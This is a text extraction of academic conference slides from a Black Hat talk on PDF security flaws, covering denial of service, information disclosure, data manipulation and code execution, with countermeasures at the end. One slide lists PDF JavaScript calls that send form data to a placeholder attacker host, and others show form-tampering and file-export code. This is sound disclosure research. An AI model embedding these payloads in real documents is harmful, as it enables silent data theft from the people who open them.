portable document flaws 101 - black hat briefings · 2020. 7. 29. · launch thread gotoe gotor...
TRANSCRIPT
-
Portable Document Flaws 101J e n s M ü l l e r, D o m i n i k N o s s , C h r i s t i a n M a i n k a , V l a d i s l av M l a d e n o v, J ö r g S c h w e n k
-
1. PDF Basics
2. Denial of Service
3. Information Disclosure
4. Data Manipulation
5. Code Execution
6. Evaluation
Overview
2
-
The Portable Document Format
3
“De facto standard for electronic exchange of documents” -- Adobe
1993PDF-2.0
COMPANIES AND GOVERNMENTAL INSTITUTIONS WORLDWIDE
FIRST VERSION RELEASED IN250 BILLIONPDF DOCUMENTS OPENED IN 2018
RELEASED IN 2017,LATEST VERSION BY ISO
BY ADOBE
~99%USED BY
-
Basics: PDF Structure
4
-
Basics: PDF Structure
5
-
Basics: PDF Structure
6
%PDF-1.7
1 0 obj Catalog
4 0 obj stream
xref
/Pages 2 0 R
„Hello world!“
trailer
/Root 1 0 R
Header
Body
XRefTable
Trailer
-
Related Work
7
%PDF-1.7
1 0 obj Catalog
4 0 obj stream
xref
/Pages 2 0 R
„Hello world!“
trailer
/Root 1 0 R
Header
Body
XRefTable
Trailer
GIF89a… ≤ 1023 bytes
PDF Encryption: [Mueller2019]
PDF Signatures: [Mladenov2019]
PDF Redaction: [Garfinkel2013]
PDF Metadata: [Alonso2008]
PDF Polyglots: [Albertini2014]
-
• Standard feature used for various purposes– Open hyperlink, go to a certain page, etc. – Even JavaScript is an action
• Various events that trigger actions– on open/close/print, etc.
• Target of actions: PDF File Specification
Basics: PDF Actions
8
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
Even
tsA
ctio
ns
Targ
ets
-
• Victim opens malicious PDF document• Bad things happen (attack-dependent)• No user interaction required
Attacker Model
12
-
1. PDF Basics
2. Denial of Service Infinite Loop, Deflate Bomb
3. Information Disclosure
4. Data Manipulation
5. Code Execution
6. Evaluation
Overview
13
-
DoS Evaluation Results
14
Infinite Loop
-
2 0 obj
>
endobj
Infinite Loop
15
/Pages 2 0 R
-
2 0 obj
>
endobj
Infinite Loop
16
/Pages 2 0 R
CVE-2007-0104
-
Action loop – PDF actions allow to specify a /Next action.
More Variants
17
5 0 obj
>
endobj
-
ObjStm loop – Object streams may extend other ObjStms.
More Variants
18
5 0 obj
>
stream
endstream
endobj
-
Outline loop – PDF outline entries can refer to each other.
More Variants
19
5 0 obj
>
>>
endobj
-
Calculations – PDF defines PS/Type 4 calculator functions.
More Variants
20
5 0 obj
>
stream
{/f {f} def f}
endstream
endobj
-
JavaScript – Scripting can be used to create endless loops.
More Variants
21
5 0 obj
>
endobj
-
DoS Evaluation Results
22
Deflate Bomb
-
• Zip bombs are well known• Streams can be compressed• Viewers must decompress
to display the content
Deflate Bomb
23
789cecdc3d2e…
-
Deflate Bomb
4 0 obj
>
stream
BT /F1 22 Tf 30 800 Td
(Hello World...) Tj ET
endstream
24
-
Deflate Bomb
4 0 obj
>
stream
BT /F1 22 Tf 30 800 Td
(AAAAAAAAAAA...) Tj ET
endstream
disk: 10 GBmem: 10 GB----------------
ratio:1:1
25
-
Deflate Bomb
4 0 obj
>
stream
789cecdc3d2e84011486d16f...
endstream
disk: 10 MBmem: 10 GB----------------
ratio:1:1023
26
-
Deflate Bomb
4 0 obj
>
stream
789cedda5d4853611cc7f1b3...
endstream
disk: 16 KBmem: 10 GB----------------
ratio: 1:640,772
27
-
Deflate Bomb
4 0 obj
>
stream
789c014202bdfd789cedda5d...
endstream
disk: 578 Bmem: 10 GB----------------
ratio: 1:18,576,848
28
-
1. PDF Basics
2. Denial of Service
3. Information Disclosure URL Invocation, Form Data Leakage,
Local File Leakage, Credential Theft
4. Data Manipulation
5. Code Execution
6. Evaluation
Overview
29
-
DoS Evaluation Results
30
URL Invocation
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
31
Compare[Filiol2008]
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
32
Compare[Filiol2008]
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
33
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
34
-
35
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
36
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
37
-
DoS Evaluation Results
38
Form Data Leakage
-
• Idea: victim obtainsmodified PDF form
• Attacker silentlyexfiltrates data
Form Data Leakage
Sou
rce:
wo
nd
ersh
are.
com
39
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA on close /AA
/AA did print
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
40
-
Page Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents
/AA
/AA did print
/Names
/OpenAction
/Open
/Print
/URI
/Base
Call Action
Embedded File Local File URL Network Share
File
value = this.getAnnots()[0].contents;
this.submitForm({cURL: "http://evil.com/"});
this.getURL("http://evil.com/"+value);
app.launchURL("http://evil.com/"+value);
app.media.getURLData("http://evil.com/"+value, "audio/mp3");
SOAP.connect("http://evil.com/"+value);
SOAP.request({cURL:"http://evil.com/"+value, oRequest:{}, cAction:""});
this.importDataObject("file", "http://evil.com/"+value);
app.openDoc("http://evil.com/"+value);
JavaScript
Annotation
/AA on close
/Link
41
-
DoS Evaluation Results
42
Local File Leakage
-
• Goal: exfiltrate arbitrary files on diskto attacker by chaining PDF features
Local File Leakage
43
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File URL Network Share
JavaScript
File
Call Action
Local File
44
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Network Share
JavaScript
File
Call Action
Local File URL
45
-
DoS Evaluation Results
46
Credential Theft
-
• Offline cracking– NTLMv2: modern GPU requires 2,5h for eight chars– NTLMv1, LM: considered broken [Marlinspike2012]
• Pass-the-hash or relay attacks– Compare [Ochoa2008, Hummel2009]– Depending on Windows security policy
Credential Theft
47
-
Credential Theft
Sou
rce:
Th
reat
po
st
48
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
49
-
1. PDF Basics
2. Denial of Service
3. Information Disclosure
4. Data Manipulation Form Modification, File Write Access, Content Masking
5. Code Execution
6. Evaluation
38
Overview
-
DoS Evaluation Results
51
Form Modification
-
• Idea: victim obtainsmodified PDF form
• Attacker silentlymanipulares data(e.g., on printing)
Form Modification
Sou
rce:
wo
nd
ersh
are.
com
52
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA will print
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
53
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA will print
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
old_value = getAnnots()[i].contents;
getAnnots()[i].contents = "new value";
54
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA /Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
getAnnots()[i].contents = old_value;
/AA did print
55
-
DoS Evaluation Results
56
File Write Access
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
57
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Actionthis.exportAsFDF(false, true, "file.fdf");
this.exportAsXFDF(false, true, "file.xfdf")
this.exportAsText(true, "file.txt");
this.exportDataObject({cName: "file.pdf"});
this.exportXFAData({cPath: "file.xdp"});
this.extractPages({cPath: "file.pdf"});
58
-
DoS Evaluation Results
59
Content Masking
-
Content Masking
60
%PDF-1.7
1 0 obj Catalog
4 0 obj stream
xref
/Pages 2 0 R
„Hello world!“
trailer
/Root 1 0 R
Header
Body
XRefTable
Trailer
Spec ambiguities
-
%PDF-1.7
Content Masking
• PDF confusion
61
1 0 obj Catalog
4 0 obj stream
xref
/Pages 2 0 R
„Hello world!“
trailer
/Root 1 0 R
Header
Body
XRefTable
Trailer
Spec ambiguities
-
Content Masking
62
%PDF-1.7
4 0 obj stream
xref
„Hello world!“
Header
Body
XRefTable
Trailertrailer
/Root 1 0 R
1 0 obj Catalog
/Pages 2 0 R
Spec ambiguities
• PDF confusion• Doc confusion
-
Content Masking
63
%PDF-1.7
1 0 obj Catalog
/Pages 2 0 R
„Hello world!“
trailer
/Root 1 0 R
Header
Body
XRefTable
Trailer
4 0 obj stream
xref
Spec ambiguities
• PDF confusion• Doc confusion• Object confusion
-
Content Masking
64
%PDF-1.7
1 0 obj Catalog
xref
/Pages 2 0 R
„Hello world!“
trailer
/Root 1 0 R
Header
Body
XRefTable
Trailer
4 0 obj stream
Spec ambiguities
• PDF confusion• Doc confusion• Object confusion• Content streams
-
Content Masking
65
%PDF-1.7
1 0 obj Catalog
4 0 obj stream
xref
/Pages 2 0 R
trailer
/Root 1 0 R
Header
Body
XRefTable
Trailer
„Hello world!“
Spec ambiguities
• PDF confusion• Doc confusion• Object confusion• Content streams• Stream syntax
-
Content Masking
4 0 obj
>
stream
q 0.2 0.4 1 rg 0 0 595 842 re F Q BT /F1 22 Tf 30 800 Td (This is the 1st stream part) Tj ET
endstream
q 1 0.3 0.3 rg 0 0 595 842 re F Q BT /F1 22 Tf 30 800 Td (This is the 2nd stream part) Tj ET
endstream
endobj
66
-
Content Masking
4 0 obj
>
stream
q 0.2 0.4 1 rg 0 0 595 842 re F Q BT /F1 22 Tf 30 800 Td (This is the 1st stream part) Tj ET
endstream
q 1 0.3 0.3 rg 0 0 595 842 re F Q BT /F1 22 Tf 30 800 Td (This is the 2nd stream part) Tj ET
endstream
endobj
67
-
Content Masking
68
-
Content Masking
69
-
1. PDF Basics
2. Denial of Service
3. Information Disclosure
4. Data Manipulation
5. Code Execution Launch Action
6. Evaluation
49
Overview
-
DoS Evaluation Results
71
Launch Action
-
• Launch Action:
• PDF has “code execution by design”
Code Execution
72
-
Page Annotation Field Catalog
Launch Thread GoToE GoToR ImportData SubmitForm URI
/AA
/Contents /Link
/AA /AA
/AA
/Names
/OpenAction
/Open
/Print
/URI
/Base
Embedded File Local File URL Network Share
JavaScript
File
Call Action
73
-
1. PDF Basics
2. Denial of Service
3. Information Disclosure
4. Data Manipulation
5. Code Execution
6. Evaluation
53
Overview
-
75
-
• Eliminating specification ambiguities• Resource limitation and sandboxing• Removing or restricting JavaScript• Identification of dangerous paths
Countermeasures
76
-
• PDF is a complex format• Standard is full of pitfalls• Logic chain RCE in 2020 :)
Black Hat Sound Bytes
77
Exploits: https://github.com/RUB-NDS/PDF101